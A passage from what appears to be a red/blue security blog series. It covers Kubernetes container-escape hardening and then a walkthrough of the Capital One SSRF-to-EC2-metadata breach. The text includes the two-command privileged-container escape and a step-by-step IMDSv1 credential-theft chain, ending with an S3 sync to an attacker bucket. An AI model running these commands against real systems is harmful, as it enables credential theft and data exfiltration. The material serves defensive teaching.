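        if spec.get("hostPID") is True:
            alerts.append((when, who, target, "hostPID"))
    return alerts
```

Pass it an open file handle for the audit log, for example the /var/log/kubernetes/audit.log path used above. It reports what was requested through the API server, not what a process did after the container started.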

Purple Phase: Structural Fixes

Fix 1: PodSecurity Admission — Enforce Restricted Profile

PodSecurity admission (built into Kubernetes 1.25+, replacing PodSecurityPolicy) enforces security profiles at the namespace level. The Restricted profile blocks --privileged, hostPID, hostNetwork, hostPath volumes, and requires dropping all capabilities.

# Enforce the Restricted PodSecurity profile on a namespace
# This blocks any pod that doesn't meet the criteria from scheduling
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    # enforce: pod is rejected at admission if spec violates Restricted
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    # audit: violations are logged but not rejected (useful for rollout)
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/audit-version: latest
    # warn: user gets a warning but pod is allowed (for migration)
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/warn-version: latest

What Restricted profile blocks (relevant to escape paths):

# These settings are REQUIRED by Restricted unless noted otherwise. Apply them
# explicitly to avoid the PodSecurity admission controller rejecting your workloads

securityContext:
  # Pod-level
  runAsNonRoot: true
  seccompProfile:
    type: RuntimeDefault    # or Localhost with a custom profile

containers:
  - securityContext:
      allowPrivilegeEscalation: false
      privileged: false          # blocks Path 1
      capabilities:
        drop: ["ALL"]            # no CAP_SYS_ADMIN, no CAP_NET_ADMIN
        add: []                  # Restricted permits adding only NET_BIND_SERVICE
      readOnlyRootFilesystem: true  # not required by Restricted; reduces attacker persistence options

# Pod spec — blocked by Restricted
spec:
  hostPID: false           # must be false (blocks Path 2)
  hostNetwork: false       # must be false
  hostIPC: false           # must be false
  volumes:                 # hostPath volumes blocked
    - name: app-data
      emptyDir: {}         # emptyDir, configMap, secret allowed; hostPath not
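
A pre-flight check against the settings listed above can be sketched in Python. This is a partial, illustrative check and not the PodSecurity admission logic itself: it covers only the fields shown in this section, ignores initContainers and ephemeral containers, and the function name restricted_violations is an assumption.

```python
def restricted_violations(pod_spec):
    """Return human-readable violations for a subset of the Restricted profile."""
    violations = []

    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if pod_spec.get(flag):
            violations.append(f"{flag} must be false")

    for vol in pod_spec.get("volumes") or []:
        if "hostPath" in vol:
            violations.append(f"volume {vol.get('name')}: hostPath is not allowed")

    pod_sc = pod_spec.get("securityContext") or {}
    for c in pod_spec.get("containers") or []:
        sc = c.get("securityContext") or {}
        name = c.get("name")

        if sc.get("privileged"):
            violations.append(f"{name}: privileged must be false")
        if sc.get("allowPrivilegeEscalation") is not False:
            violations.append(f"{name}: allowPrivilegeEscalation must be false")

        caps = sc.get("capabilities") or {}
        if "ALL" not in (caps.get("drop") or []):
            violations.append(f"{name}: capabilities.drop must include ALL")
        extra = set(caps.get("add") or []) - {"NET_BIND_SERVICE"}
        if extra:
            violations.append(f"{name}: capabilities.add not allowed: {sorted(extra)}")

        # Container-level settings override pod-level ones
        if sc.get("runAsNonRoot", pod_sc.get("runAsNonRoot")) is not True:
            violations.append(f"{name}: runAsNonRoot must be true")
        seccomp = sc.get("seccompProfile") or pod_sc.get("seccompProfile") or {}
        if seccomp.get("type") not in ("RuntimeDefault", "Localhost"):
            violations.append(f"{name}: seccompProfile.type must be RuntimeDefault or Localhost")
    return violations
```

An empty list means the spec passes this subset of checks; the admission controller remains the source of truth.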

Rollout approach for existing clusters:

Start with warn mode on all namespaces, identify violations, remediate, then promote to enforce:

# Label all non-system namespaces with warn mode first
kubectl get namespaces -o json | \
  jq -r '.items[] |
    select(.metadata.name | test("^(kube-system|kube-public|kube-node-lease)$") | not) |
    .metadata.name' | \
  while read ns; do
    kubectl label namespace "$ns" \
      pod-security.kubernetes.io/warn=restricted \
      pod-security.kubernetes.io/warn-version=latest \
      --overwrite
    echo "Labeled $ns"
  done

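# Warn mode returns warnings to the client that submits the pod; it does not create Events.
# To list existing pods that would violate enforce mode, dry-run the label server-side:
kubectl label --dry-run=server --overwrite ns --all \
  pod-security.kubernetes.io/enforce=restricted

# After promoting to enforce, rejected controller-created pods appear as FailedCreate events
kubectl get events -A --field-selector reason=FailedCreate \
  -o json | jq -r '.items[] | select(.message | contains("violates PodSecurity"))'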

Fix 2: RuntimeClass — Hardware-Level Isolation for Untrusted Workloads

For workloads that cannot run under Restricted profile (CNI plugins, monitoring agents, specific DaemonSets), the alternative is a stronger isolation boundary: a sandboxed runtime.

gVisor intercepts system calls in a user-space kernel (the Sentry) that sits between the container and the Linux kernel; Kata Containers runs each pod inside a lightweight VM with its own guest kernel. In both cases, a container escape exploiting a kernel vulnerability or a privileged mount hits the sandbox boundary, not the host kernel.

# Define a RuntimeClass for gVisor (runsc)
# Requires gVisor installed on nodes with the runsc runtime handler
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc   # must match the handler name in containerd/crio config
scheduling:
  nodeSelector:
    runtime.gvisor: "true"   # only schedule on nodes that have gVisor
---
# Use the RuntimeClass in a pod spec
apiVersion: v1
kind: Pod
metadata:
  name: untrusted-workload
spec:
  runtimeClassName: gvisor   # all syscalls go through gVisor's sentry
  containers:
    - name: app
      image: untrusted-image:latest

# Kata Containers: hardware VM boundary, not just a user-space syscall interceptor
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: kata-containers
handler: kata-qemu

For operators: gVisor and Kata Containers have compatibility trade-offs. Not all syscalls are supported in gVisor (it implements a subset of the Linux ABI). Kata Containers have higher startup latency (VM boot time). Benchmark your specific workload before enforcing these on production-critical pods.

Fix 3: Seccomp Profile — Block the Syscalls That Enable Escape

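Even without gVisor, a custom allowlist seccomp profile that leaves out mount, unshare, setns, and pivot_root closes the primary escape syscall surface. The example profile allows clone without argument filtering, so it does not by itself restrict clone with namespace flags; that would need an args condition on the clone rule.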

{
  "defaultAction": "SCMP_ACT_ERRNO",
  "architectures": ["SCMP_ARCH_X86_64", "SCMP_ARCH_X86", "SCMP_ARCH_X32"],
  "syscalls": [
    {
      "names": [
        "accept", "accept4", "access", "arch_prctl",
        "bind", "brk", "capget", "capset",
        "chdir", "chmod", "chown", "clock_gettime",
        "clone",
        "close", "connect",
        "dup", "dup2", "dup3",
        "execve", "exit", "exit_group",
        "fchmod", "fchown", "fcntl",
        "fstat", "fstatfs", "fsync",
        "futex", "getcwd", "getdents64",
        "getegid", "geteuid", "getgid", "getgroups",
        "getpeername", "getpid", "getppid",
        "getrlimit", "getsockname", "getsockopt",
        "gettid", "gettimeofday", "getuid",
        "inotify_add_watch", "inotify_init1",
        "listen", "lseek", "lstat",
        "madvise", "mmap", "mprotect",
        "munmap", "nanosleep",
        "open", "openat",
        "pipe", "pipe2", "poll", "ppoll",
        "prctl", "pread64", "pwrite64",
        "read", "readlink", "readv",
        "recvfrom", "recvmsg", "recvmmsg",
        "rename", "rt_sigaction", "rt_sigprocmask",
        "rt_sigreturn", "sched_getaffinity",
        "select", "sendfile", "sendmsg", "sendto",
        "set_robust_list", "set_tid_address",
        "setgid", "setgroups", "setuid",
        "setsockopt", "shutdown",
        "socket", "socketpair",
        "stat", "statfs", "symlink",
        "tgkill", "time", "timerfd_create",
        "timerfd_settime", "truncate",
        "uname", "unlink", "unlinkat",
        "wait4", "waitid",
        "write", "writev"
      ],
      "action": "SCMP_ACT_ALLOW"
    }
  ]
}

Apply via pod spec:

spec:
  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: "container-escape-block.json"
      # Profile must be in /var/lib/kubelet/seccomp/ on each node

# Distribute the seccomp profile to all nodes via DaemonSet
# Example using a DaemonSet that copies the profile file on startup
# (or use the built-in RuntimeDefault, which blocks several dozen dangerous syscalls out of 300+)

# RuntimeDefault blocks: mount, unshare, clone with new-ns flags,
# add_key, keyctl, request_key, pivot_root — adequate for most workloads
spec:
  securityContext:
    seccompProfile:
      type: RuntimeDefault
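
Before distributing a custom profile, it helps to confirm that it really leaves the escape-relevant syscalls out. The sketch below is a simplified reading of the seccomp JSON format: it ignores per-rule argument filters and architecture differences, the ESCAPE_SYSCALLS set is an illustrative selection rather than an authoritative list, and the function name is an assumption.

```python
# Syscalls commonly involved in namespace or filesystem escapes (illustrative selection)
ESCAPE_SYSCALLS = {
    "mount", "umount2", "unshare", "setns", "pivot_root",
    "ptrace", "bpf", "open_by_handle_at", "init_module", "finit_module",
}

# Actions that let the syscall proceed
PERMISSIVE_ACTIONS = {"SCMP_ACT_ALLOW", "SCMP_ACT_LOG"}


def allowed_escape_syscalls(profile):
    """Return the escape-relevant syscalls that a parsed seccomp profile permits."""
    if profile.get("defaultAction") in PERMISSIVE_ACTIONS:
        allowed = set(ESCAPE_SYSCALLS)   # denylist-style profile
    else:
        allowed = set()                  # allowlist-style profile
    for rule in profile.get("syscalls") or []:
        names = set(rule.get("names") or []) & ESCAPE_SYSCALLS
        if rule.get("action") in PERMISSIVE_ACTIONS:
            allowed |= names             # argument filters are ignored here
        else:
            allowed -= names
    return sorted(allowed)


# Hypothetical profile: allowlist that accidentally includes mount
example = {
    "defaultAction": "SCMP_ACT_ERRNO",
    "syscalls": [{"names": ["read", "write", "clone", "mount"],
                  "action": "SCMP_ACT_ALLOW"}],
}
print(allowed_escape_syscalls(example))
```

An empty result for a custom profile is what the allowlist approach aims for; any name it returns deserves a deliberate justification.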

Fix 4: Network Policy — Contain the Blast Radius After Escape

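Even if a container is compromised, a network policy that prevents the workload's pods from reaching the Kubernetes API server limits what the attacker can do from inside the pod network. NetworkPolicy governs pod traffic only: a process that has fully entered the host network namespace is outside its scope, so pair it with node-level firewalling or cloud security groups for traffic that originates from the node itself.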

# Deny all egress from application namespace to Kubernetes API server
# The API server typically runs on port 6443 on the control plane nodes
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-api-server-egress
  namespace: production
spec:
  podSelector: {}       # applies to all pods in namespace
  policyTypes:
    - Egress
  egress:
    # Allow DNS
    - ports:
        - protocol: UDP
          port: 53
    # Allow application traffic (customize per workload)
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: production
    # Explicitly: no rule allowing egress to control plane CIDR
    # This is a deny-by-absence — egress to control plane falls through to default deny

# Also block pod-to-pod communication across namespaces
# to prevent an escaped pod from pivoting to other workloads
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: production
spec:
  podSelector: {}
  policyTypes:
    - Ingress
    - Egress
  # No ingress or egress rules = deny all
  # Add specific rules above this as needed

Fix 5: Node Isolation — Co-location Risk

An internet-facing pod and a pod with access to sensitive internal services should not share a node. If the internet-facing pod escapes, it reaches the node’s credentials and can pivot to anything else scheduled on that node.

# Use node selectors, taints, and tolerations to separate workload tiers

# Taint sensitive nodes so only specific workloads schedule there
kubectl taint nodes sensitive-node-1 workload-tier=sensitive:NoSchedule

# Internet-facing pods: dedicated public-tier nodes
# Internal/privileged pods: dedicated sensitive-tier nodes

# Pod spec for internet-facing workload — only schedules on public nodes
spec:
  nodeSelector:
    workload-tier: public
  tolerations: []   # No toleration for sensitive node taint

# Pod spec for sensitive workload — only schedules on sensitive nodes
spec:
  nodeSelector:
    workload-tier: sensitive
  tolerations:
    - key: workload-tier
      operator: Equal
      value: sensitive
      effect: NoSchedule
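
Whether the separation actually holds can be checked from the scheduler's results. The sketch below assumes pods carry a workload-tier label with the same values as the node labels used above; that pod label is a hypothetical convention for illustration, as is the function name mixed_tier_nodes.

```python
from collections import defaultdict


def mixed_tier_nodes(pods, label="workload-tier"):
    """Return {node: [tiers]} for nodes hosting both public and sensitive pods.

    pods is the "items" list from `kubectl get pods -A -o json`.
    """
    tiers_by_node = defaultdict(set)
    for pod in pods:
        node = (pod.get("spec") or {}).get("nodeName")
        labels = (pod.get("metadata") or {}).get("labels") or {}
        tier = labels.get(label)
        if node and tier:
            tiers_by_node[node].add(tier)
    return {
        node: sorted(tiers)
        for node, tiers in tiers_by_node.items()
        if {"public", "sensitive"} <= tiers
    }
```

Any node it returns is a place where an escape from an internet-facing pod lands next to a sensitive workload.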

⚠ Production Gotchas

Legitimate workloads that require --privileged or hostPID. CNI plugins (Cilium, Calico, Flannel node agents), node-local-dns, monitoring agents (node exporters, eBPF-based agents like Tetragon itself), and storage drivers often need elevated access. Blanket enforcement of Restricted profile without exceptions breaks these workloads. The approach: enforce Restricted on application namespaces; use a dedicated namespace for infrastructure DaemonSets with the Privileged policy (Baseline also forbids privileged containers and host namespaces) and compensate with Falco detection and node isolation.

Seccomp under Restricted blocks some monitoring agents. The RuntimeDefault seccomp profile that Restricted requires blocks several syscalls that APM agents and profiling tools use. Run strace -c -f ./your-agent to capture the syscall profile of your monitoring agent before enforcing Restricted. Common culprits: perf_event_open (used by profilers), ptrace (used by some debuggers), bpf (used by eBPF-based tools). Add these to an allowlist seccomp profile rather than running the agent without any profile.

runc CVEs require node patching, not policy. PodSecurity admission and Falco rules protect against configuration-based escapes. A vulnerability in runc, containerd, or the Linux kernel itself bypasses policy-based controls entirely. Keep container runtime versions current; enable automatic node OS patching (Bottlerocket, Flatcar Linux) if your infrastructure allows it. Subscribe to CVE feeds for containerd (containerd/containerd) and runc (opencontainers/runc) specifically.

hostPath volumes are a partial equivalent to --privileged. A pod without --privileged but with a hostPath volume mounting /etc or /var/lib/kubelet can read node credentials without needing to mount a block device. Both the Baseline and Restricted profiles forbid hostPath volumes; only the Privileged profile allows them. Audit for hostPath volumes separately from --privileged, especially in namespaces exempted from enforcement.

RuntimeClass with gVisor has syscall compatibility gaps. Applications that use io_uring, certain socket options, or kernel modules will not work under gVisor’s sentry. Test in staging before deploying to production. The gVisor compatibility matrix is documented at gvisor.dev/docs/user_guide/compatibility — check it for any application that does direct filesystem I/O at high volume (databases, high-throughput queues) as the overhead may be unacceptable even if the syscalls are supported.

Quick Reference

Escape Path	Precondition	Detection Signal	Structural Fix
Privileged container → mount	`privileged: true`	Falco: mount syscall from container; Tetragon: sys_mount kprobe	PodSecurity Restricted enforce; seccomp blocks mount
hostPID + nsenter	`hostPID: true`	Falco: nsenter exec in container; audit log: pod creation with hostPID	PodSecurity Restricted (blocks hostPID)
hostNetwork + IMDS	`hostNetwork: true`	CloudWatch: MetadataNoToken metric (IMDSv1 calls); CloudTrail: role credentials used from unexpected source	Enforce IMDSv2 hop limit 1; PodSecurity Restricted
runc CVE (CVE-2019-5736)	Unpatched runc	Tetragon: vfs_write to /proc/self/exe	Patch runc/containerd; use RuntimeClass (gVisor)
hostPath volume mount	hostPath to sensitive path	Falco: sensitive host file access; PodSecurity audit	PodSecurity Restricted (blocks hostPath)
Escaped → API server	Node credential access	Audit log: API calls from node IP at unexpected time	Network policy blocking node→API server egress

Key Takeaways

Kubernetes container escape starts at the kernel: --privileged, hostPID, and hostNetwork remove Linux namespace and cgroup isolation — the Kubernetes API cannot prevent what happens inside a process that runs with those flags
Two commands from privileged container to root on the node: mount /dev/sda1 /mnt/host and chroot /mnt/host /bin/bash — this is not a sophisticated exploit, it is a default kernel behavior
eBPF detection (Falco, Tetragon) operates at the syscall level and catches the escape in progress; Kubernetes audit logs only catch the misconfigured pod creation, not the exploitation
PodSecurity Restricted enforcement at the namespace level is the structural fix for configuration-based escapes — it blocks --privileged, hostPID, hostNetwork, and hostPath volumes before a pod schedules
runc-class CVEs are independent of configuration — node-level patching and RuntimeClass (gVisor/Kata) isolation are the controls, not policy enforcement
Network policy as a secondary layer limits post-escape lateral movement: a container that escapes to the node should not be able to reach the API server with stolen node credentials

What’s Next

Container escape requires access to a running pod. But what if the attacker didn’t need to exploit anything at runtime — they shipped the attack as a dependency your build pipeline trusted? EP09 covers supply chain attacks from SolarWinds to XZ Utils: how a malicious package or a compromised build step becomes arbitrary code execution before the container ever runs, the detection patterns that are specific to supply chain compromise (dependency confusion, typosquatting, malicious maintainer takeovers), and the SLSA framework controls that create a verifiable chain of custody from source to deployed artifact.

SSRF to Cloud Metadata: How IMDSv1 Enabled the Capital One Breach

June 22, 2026 by Vamshi Krishna Santhapuri

Reading Time: 15 minutes

TL;DR

SSRF cloud metadata attack is OWASP A10: an attacker exploits a server-side request forgery vulnerability to reach 169.254.169.254 — the EC2 Instance Metadata Service — and retrieve IAM role credentials without authentication
IMDSv1 (the only version available before November 2019) requires no authentication token; any HTTP request from the instance to the IMDS endpoint returns credentials, so SSRF anywhere in the stack is sufficient
Capital One (2019): a misconfigured WAF running on EC2 had an SSRF vulnerability → attacker hit the IMDS endpoint → retrieved IAM role credentials → enumerated and exfiltrated over 100 million customer records from S3; $190M settlement
IMDSv2 requires a PUT request to obtain a session token first, a step that a typical GET-only SSRF cannot perform, which makes the IMDS resistant to standard SSRF exploitation; --http-tokens required is the one-line enforcement
Hop limit of 1 is the container-layer defense: the token response's IP TTL expires before it crosses the extra network hop to a container on a bridged network, so processes in such containers cannot obtain a token (containers on the host network are not affected)
The structural fix is eliminating the credential entirely: OIDC workload identity replaces the attached IAM role with a dynamically issued, scoped token, so there is no IMDS credential to steal

OWASP Mapping: A10 — Server-Side Request Forgery (SSRF). The attacker causes the server to make a request to an unintended destination — in this case, the link-local metadata endpoint that returns cloud IAM credentials.

The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│                    SSRF → IMDS → CREDENTIAL CHAIN                       │
│                                                                         │
│   ATTACKER                                                              │
│      │                                                                  │
│      │  1. Discovers SSRF in web app (WAF, proxy, image fetch, etc.)    │
│      │                                                                  │
│      ▼                                                                  │
│   WEB APP / WAF (running on EC2)                                        │
│      │                                                                  │
│      │  2. App follows attacker-controlled URL                          │
│      │     GET http://169.254.169.254/latest/meta-data/                 │
│      │     iam/security-credentials/ROLE_NAME                          │
│      ▼                                                                  │
│   EC2 INSTANCE METADATA SERVICE (IMDSv1 — no auth required)            │
│      │                                                                  │
│      │  3. Returns JSON: AccessKeyId, SecretAccessKey, Token            │
│      ▼                                                                  │
│   ATTACKER (now has temporary IAM credentials)                          │
│      │                                                                  │
│      │  4. aws sts get-caller-identity → confirm identity               │
│      │  5. aws s3 ls → enumerate all accessible buckets                 │
│      │  6. aws s3 cp s3://target-bucket/ . --recursive                  │
│      ▼                                                                  │
│   100M+ customer records exfiltrated                                    │
│                                                                         │
│   ─────────────────────────────────────────────────────────────────     │
│   IMDSv2 BREAKS THIS CHAIN AT STEP 2                                    │
│   PUT /latest/api/token required first → SSRF can't follow             │
│   (SSRF typically cannot initiate a PUT before a GET)                   │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘

The SSRF cloud metadata attack chain is short enough to fit in a single diagram because there are only three moving parts: the SSRF vulnerability, an unauthenticated metadata endpoint, and the IAM credentials waiting behind it. Remove any one of those three elements and the chain breaks. Capital One had all three.
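
The IMDSv2 step shown at the bottom of the diagram can be sketched with the Python standard library. The endpoint paths and the two X-aws-ec2-metadata-token headers are the documented IMDSv2 interface; the helper names are illustrative assumptions, and fetch_role_names only returns data when run on an EC2 instance.

```python
import urllib.request

IMDS = "http://169.254.169.254"


def build_token_request(ttl_seconds=21600):
    """Step 1: a PUT with a TTL header. A GET-only SSRF cannot produce this request."""
    return urllib.request.Request(
        f"{IMDS}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def build_metadata_request(path, token):
    """Step 2: a GET that must carry the session token from step 1."""
    return urllib.request.Request(
        f"{IMDS}/latest/meta-data/{path.lstrip('/')}",
        headers={"X-aws-ec2-metadata-token": token},
    )


def fetch_role_names(timeout=2):
    """Run both steps against the real endpoint (only works on an EC2 instance)."""
    with urllib.request.urlopen(build_token_request(), timeout=timeout) as resp:
        token = resp.read().decode()
    request = build_metadata_request("iam/security-credentials/", token)
    with urllib.request.urlopen(request, timeout=timeout) as resp:
        return resp.read().decode().split()
```

The point of the design is visible in build_token_request: the attacker would need control over the HTTP method and a custom header, which most SSRF primitives (a URL fetched with GET) do not offer.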

The Incident: Capital One (2019)

In March 2019, Capital One was running a misconfigured WAF on AWS EC2. The WAF was a commercial product deployed in an EC2 instance with an attached IAM role, which is standard practice and necessary for the WAF to interact with other AWS services.

The attacker, later identified as Paige Thompson (arrested July 2019, former AWS engineer), found an SSRF vulnerability in the WAF’s configuration. The exact misconfiguration has been described as a firewall rule that allowed the instance to make outbound requests to internal destinations, including the link-local metadata endpoint.

The attack chain, reconstructed from court documents and Capital One’s public disclosures:

1. Identify SSRF in WAF
   ├── WAF accepts HTTP requests and forwards them to backend
   └── Attacker crafts request that causes WAF to make outbound HTTP call
       to attacker-controlled destination — confirms SSRF exists

2. Target the IMDS endpoint
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/
       (link-local address, reachable only from within the EC2 instance)

3. Enumerate the attached role
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/
       → returns role name: "capital-one-waf-role" (illustrative)

4. Retrieve the credentials
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/capital-one-waf-role
       → returns: AccessKeyId, SecretAccessKey, Token, Expiration

5. Export credentials to attacker-controlled system
   └── The SSRF response body contains the JSON credential blob
       Attacker exfiltrates the JSON out-of-band

6. Use credentials from external system
   ├── aws configure (with stolen AccessKeyId, SecretAccessKey, Token)
   ├── aws sts get-caller-identity → confirm IAM role identity
   ├── aws s3 ls → lists all S3 buckets the role can see
   └── aws s3 cp s3://[capital-one-bucket]/ . --recursive
       → 106 million customer records
       → 140,000 Social Security numbers
       → 80,000 bank account numbers

IMDSv1 required no authentication. The WAF’s attached IAM role had s3:GetObject and s3:ListBucket permissions scoped broadly enough to reach the data buckets. The SSRF was the entry point; the unauthenticated metadata endpoint was the amplifier; the overly permissive IAM role was the impact multiplier.

Capital One paid a $190M settlement. IMDSv2 did not exist when the attack happened: AWS released it in November 2019, months after the breach was discovered (July 2019), and left IMDSv1 available alongside it. What the breach demonstrated was not a zero-day but a known architectural weakness that had been present since EC2 launched.

The lesson the industry took away: IMDSv1 has no authentication. Any SSRF vulnerability in software running on an EC2 instance (the application, a WAF, a sidecar, a proxy) is a straight line to that instance’s IAM role credentials. The SSRF doesn’t need to be severe or complex. It just needs to reach 169.254.169.254.

Red Phase: How the Attack Works

What SSRF Is

Server-Side Request Forgery is a vulnerability class where an attacker can cause the server to make HTTP requests to destinations of the attacker’s choosing. The server acts as a proxy: the request originates from the server’s network context, not the attacker’s. This is what makes it dangerous in cloud environments — the server has access to link-local addresses, VPC-internal services, and cloud metadata endpoints that the attacker cannot reach directly from the internet.

SSRF surfaces in any feature that causes the server to fetch a URL on behalf of the user:
– Image URL upload/preview (e.g., “fetch this avatar URL”)
– Webhook configuration (server calls a URL you provide)
– PDF generation from URL
– Reverse proxies and WAFs with request-forwarding rules
– Server-side URL validation endpoints

Why the Metadata Endpoint Is the Target

169.254.169.254 is the IPv4 link-local address AWS reserves for the Instance Metadata Service (IMDS). It is only reachable from within the EC2 instance itself — not from the VPC, not from the internet. Every EC2 instance has it. No security group rule can block it because it does not traverse the VPC network stack. It is a hypervisor-level endpoint injected into the instance.

The IMDS endpoint serves instance-specific data: instance ID, AMI ID, region, availability zone, network interfaces — and, critically, the temporary credentials for any IAM role attached to the instance.

# (IMDSv1 — no token required, works with a plain curl)

# Step 1: Enumerate what's available under iam/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Output: the name of the attached IAM role
# Example output: MyApplicationRole

# Step 2: Retrieve the credentials for that role
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/MyApplicationRole

The response from Step 2 looks like this:

{
  "Code": "Success",
  "LastUpdated": "2019-03-22T18:03:30Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAQFAKEKEYIDEXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYFAKESECRETKEY",
  "Token": "FQoDYXdzEJr//////////wEa...very-long-session-token...==",
  "Expiration": "2019-03-23T00:03:30Z"
}

In a live response these are valid AWS temporary credentials (the values shown above are placeholders). The Token field is the STS session token. All three values together authenticate as the IAM role attached to the instance, with whatever permissions that role has been granted.
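To make the shape of that blob concrete, here is a minimal Python sketch that parses a response of this form and works out how long the credentials stay valid. The sample values are placeholders rather than real keys, and the helper names `parse_ts` and `credential_lifetime` are assumptions made for illustration.

```python
import json
from datetime import datetime, timezone

# Placeholder blob shaped like an IMDS security-credentials response (all values fake).
SAMPLE = """{
  "Code": "Success",
  "LastUpdated": "2019-03-22T18:03:30Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAQFAKEKEYIDEXAMPLE",
  "SecretAccessKey": "fake-secret",
  "Token": "fake-session-token",
  "Expiration": "2019-03-23T00:03:30Z"
}"""


def parse_ts(value):
    """Parse the UTC timestamp format used in the blob."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def credential_lifetime(blob):
    """Return (is_temporary, validity_window) for a credential blob."""
    creds = json.loads(blob)
    # Temporary STS credentials use access key IDs that start with "ASIA".
    is_temporary = creds["AccessKeyId"].startswith("ASIA")
    window = parse_ts(creds["Expiration"]) - parse_ts(creds["LastUpdated"])
    return is_temporary, window


temporary, window = credential_lifetime(SAMPLE)
print(temporary, window)
```

The window matters for response planning: stolen instance-role credentials keep working until the Expiration timestamp, no matter what happens to the instance they came from.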

The Full Attack Chain

Step-by-step, with the commands an attacker would run after recovering credentials from an SSRF:

Step 1: Confirm the SSRF and find the metadata endpoint

# Attacker sends request that causes the vulnerable server to fetch a URL
# The exact mechanism depends on the vulnerability (webhook, image URL, etc.)
# For a Capital One-style WAF SSRF, this might be a crafted HTTP header

# Test if SSRF can reach IMDS:
# Attacker controls a listener (e.g., Burp Collaborator, requestbin)
# then pivots to the metadata endpoint once SSRF is confirmed

Step 2: Exfiltrate credentials via SSRF

# Via the SSRF, the server makes this request:
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# → returns role name in response body

curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/MyApplicationRole
# → returns AccessKeyId, SecretAccessKey, Token JSON

Step 3: Use credentials from attacker’s system

# Export the stolen credentials
export AWS_ACCESS_KEY_ID="ASIAQFAKEKEYIDEXAMPLE"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYFAKESECRETKEY"
export AWS_SESSION_TOKEN="FQoDYXdzEJr...=="

# Confirm identity
aws sts get-caller-identity
# Output shows which account and role — confirms credentials are valid

{
    "UserId": "AROAQFAKEUSERID:i-01234567890abcdef0",
    "Account": "123456789012",
    "Arn": "arn:aws:sts::123456789012:assumed-role/MyApplicationRole/i-01234567890abcdef0"
}

Step 4: Enumerate and exfiltrate

# List all accessible S3 buckets
aws s3 ls
# Output: every bucket in the account (the role needs s3:ListAllMyBuckets for this call)

# List contents of a specific bucket
aws s3 ls s3://target-bucket/ --recursive | head -50

# Check what IAM actions are allowed (enumerate permissions)
# simulate-principal-policy expects the IAM role ARN, not the assumed-role session ARN,
# and only succeeds if the stolen role is itself allowed iam:SimulatePrincipalPolicy
aws iam simulate-principal-policy \
  --policy-source-arn "arn:aws:iam::123456789012:role/MyApplicationRole" \
  --action-names "s3:GetObject" "s3:PutObject" "ec2:DescribeInstances" "iam:ListRoles" \
  --query 'EvaluationResults[?EvalDecision==`allowed`].EvalActionName' \
  --output text

# Exfiltrate
aws s3 cp s3://target-bucket/ /tmp/exfil/ --recursive
# Or to attacker-controlled bucket:
aws s3 sync s3://target-bucket/ s3://attacker-bucket/

Simulating It Safely: Test IMDSv1 Enforcement on Your Own Instances

Before running detection controls, confirm which of your instances are still vulnerable:

# Test 1: Can you reach IMDS at all? (run from inside the instance)
curl -s http://169.254.169.254/latest/meta-data/ --max-time 2
# If this returns a list of metadata fields, IMDS is reachable

# Test 2: Is IMDSv1 still enabled? (no token required)
curl -s http://169.254.169.254/latest/meta-data/instance-id --max-time 2
# If this returns an instance ID without supplying a token → IMDSv1 is enabled
# Example output: i-01234567890abcdef0

# Test 3: Check the enforcement state via AWS CLI (from outside the instance)
aws ec2 describe-instances \
  --instance-ids i-01234567890abcdef0 \
  --query 'Reservations[].Instances[].MetadataOptions'

[
    {
        "State": "applied",
        "HttpTokens": "optional",           ← "optional" means IMDSv1 is still enabled
        "HttpPutResponseHopLimit": 1,
        "HttpEndpoint": "enabled",
        "HttpProtocolIpv6": "disabled",
        "InstanceMetadataTags": "disabled"
    }
]

"HttpTokens": "optional" means IMDSv1 is still active. Any SSRF in the instance’s software stack can reach these credentials without a token.

# Audit all instances in a region for IMDSv1 exposure
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{
    InstanceId: InstanceId,
    Name: Tags[?Key==`Name`].Value | [0],
    HttpTokens: MetadataOptions.HttpTokens,
    HopLimit: MetadataOptions.HttpPutResponseHopLimit
  }' \
  --output table | \
  grep -E "optional|InstanceId"
# Any row showing "optional" is IMDSv1-exposed
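The audit above boils down to classifying each instance's MetadataOptions block. A minimal Python sketch of that classification, assuming the dictionary shape returned by describe-instances; the function name and the three labels are illustrative, not AWS terminology.

```python
def imds_exposure(metadata_options):
    """Classify a MetadataOptions dict taken from describe-instances output."""
    if metadata_options.get("HttpEndpoint") == "disabled":
        return "imds-disabled"      # no metadata service at all
    if metadata_options.get("HttpTokens") == "required":
        return "imdsv2-only"        # session token required on every request
    return "imdsv1-enabled"         # plain GET requests still work


sample = {
    "State": "applied",
    "HttpTokens": "optional",
    "HttpPutResponseHopLimit": 1,
    "HttpEndpoint": "enabled",
}
print(imds_exposure(sample))
```

Checking HttpEndpoint first avoids reporting an instance as exposed when its metadata service is switched off entirely.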

Blue Phase: Detection

What CloudTrail Logs When IMDS Credentials Are Abused

